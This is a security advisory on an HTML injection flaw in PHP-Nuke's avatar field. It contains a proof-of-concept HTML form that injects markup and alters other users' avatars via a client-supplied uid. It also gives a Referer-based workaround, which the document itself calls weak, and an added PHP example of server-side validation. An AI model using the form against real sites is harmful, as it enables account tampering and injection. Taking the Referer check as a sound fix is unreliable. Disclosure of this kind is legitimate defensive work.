PHP-Nuke Avatar HTML Injection Vulnerability
This vulnerability may be exploited using a standard web browser. The following proof of concept code was provided by "delusion" <delusi0n@bellsouth.net>:

<!-- START CODE --!>
<form name="Register" action="http://NUKEDSITE/modules.php?name=Your_Account" method="post">
<b>Code ('">[code]<b ')</b><input type="text" name="user_avatar" size="30" maxlength="30"><br><br>
<b>Username</b><input type="text" name="uname" size="30" maxlength="255"><br>
<b>User ID:<input type="text" name="uid" size="30">
<input type="hidden" name="op" value="saveuser">
<input type="submit" value="Save Changes">
</form>
<!-- END CODE --!>

To modify other users' avatar information:

Search for "saveuser". You should get to a function that looks like this:

    function saveuser($uid, $realname, $uname, $email, etc...

Right underneath the function call, put this in:

    $referer = getenv("HTTP_REFERER");
    $nukeurl="http://digital-delusions.com";
    $nukeurl2="http://digital-delusions.dyn.ee";
    $nukeurl3="http://192.168.0.254";
    if (substr("$referer",0,strlen($nukeurl))==$nukeurl OR substr("$referer",0,strlen($nukeurl2))==$nukeurl2 OR substr("$referer",0,strlen($nukeurl3))==$nukeurl3) {

Make sure you change my URLs to your site's URLs.

    [ ... ]
    Header("Location: modules.php?name=$module_name");
    }
    }
    }

Before the last "}" paste this:

    } else {
    echo "delusion ownz j00";
    }
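
The workaround above depends on the Referer header, which is supplied by the client, and the visible part of it does not constrain the avatar value. As an added example (not PHP-Nuke code and not part of the original advisory), the following PHP shows server-side checks that address the injection directly: an allowlist for the avatar name, a check that the posted uid matches the session's uid, and attribute encoding on output. The function names, the avatars/ path and the sample inputs are assumptions constructed for illustration.

```php
<?php
// Added example: not PHP-Nuke code. Function names, the avatars/ path and
// the sample inputs below are assumptions constructed for illustration.

// Accept only a plain image file name of at most 30 characters (the form's
// maxlength): no quotes, angle brackets, spaces or path separators.
function avatar_is_valid(string $avatar): bool
{
    return strlen($avatar) <= 30
        && preg_match('/\A[A-Za-z0-9_-]+\.(?:gif|jpe?g|png)\z/', $avatar) === 1;
}

// The uid form field is client-controlled, so the account being saved must
// match the uid bound to the authenticated server-side session.
function may_save_user(int $sessionUid, $postedUid): bool
{
    return is_string($postedUid)
        && ctype_digit($postedUid)
        && (int) $postedUid === $sessionUid;
}

// Encode on output as well, so a value stored before validation existed
// cannot close the src attribute and start new markup.
function avatar_img_tag(string $avatar): string
{
    $safe = htmlspecialchars($avatar, ENT_QUOTES, 'UTF-8');
    return '<img src="avatars/' . $safe . '" alt="">';
}

// Constructed inputs: a normal name, the quote-breaking pattern from the
// form label above, and a name containing path separators.
foreach (['blank.gif', '">[code]<b ', '../blank.gif'] as $sample) {
    printf("%-14s %s\n", $sample, avatar_is_valid($sample) ? 'accepted' : 'rejected');
}

// Session uid 7 saving its own record, then trying to save uid 2.
var_dump(may_save_user(7, '7'), may_save_user(7, '2'));

// The stored-value case: the markup characters come out as entities.
echo avatar_img_tag('">[code]<b '), "\n";
```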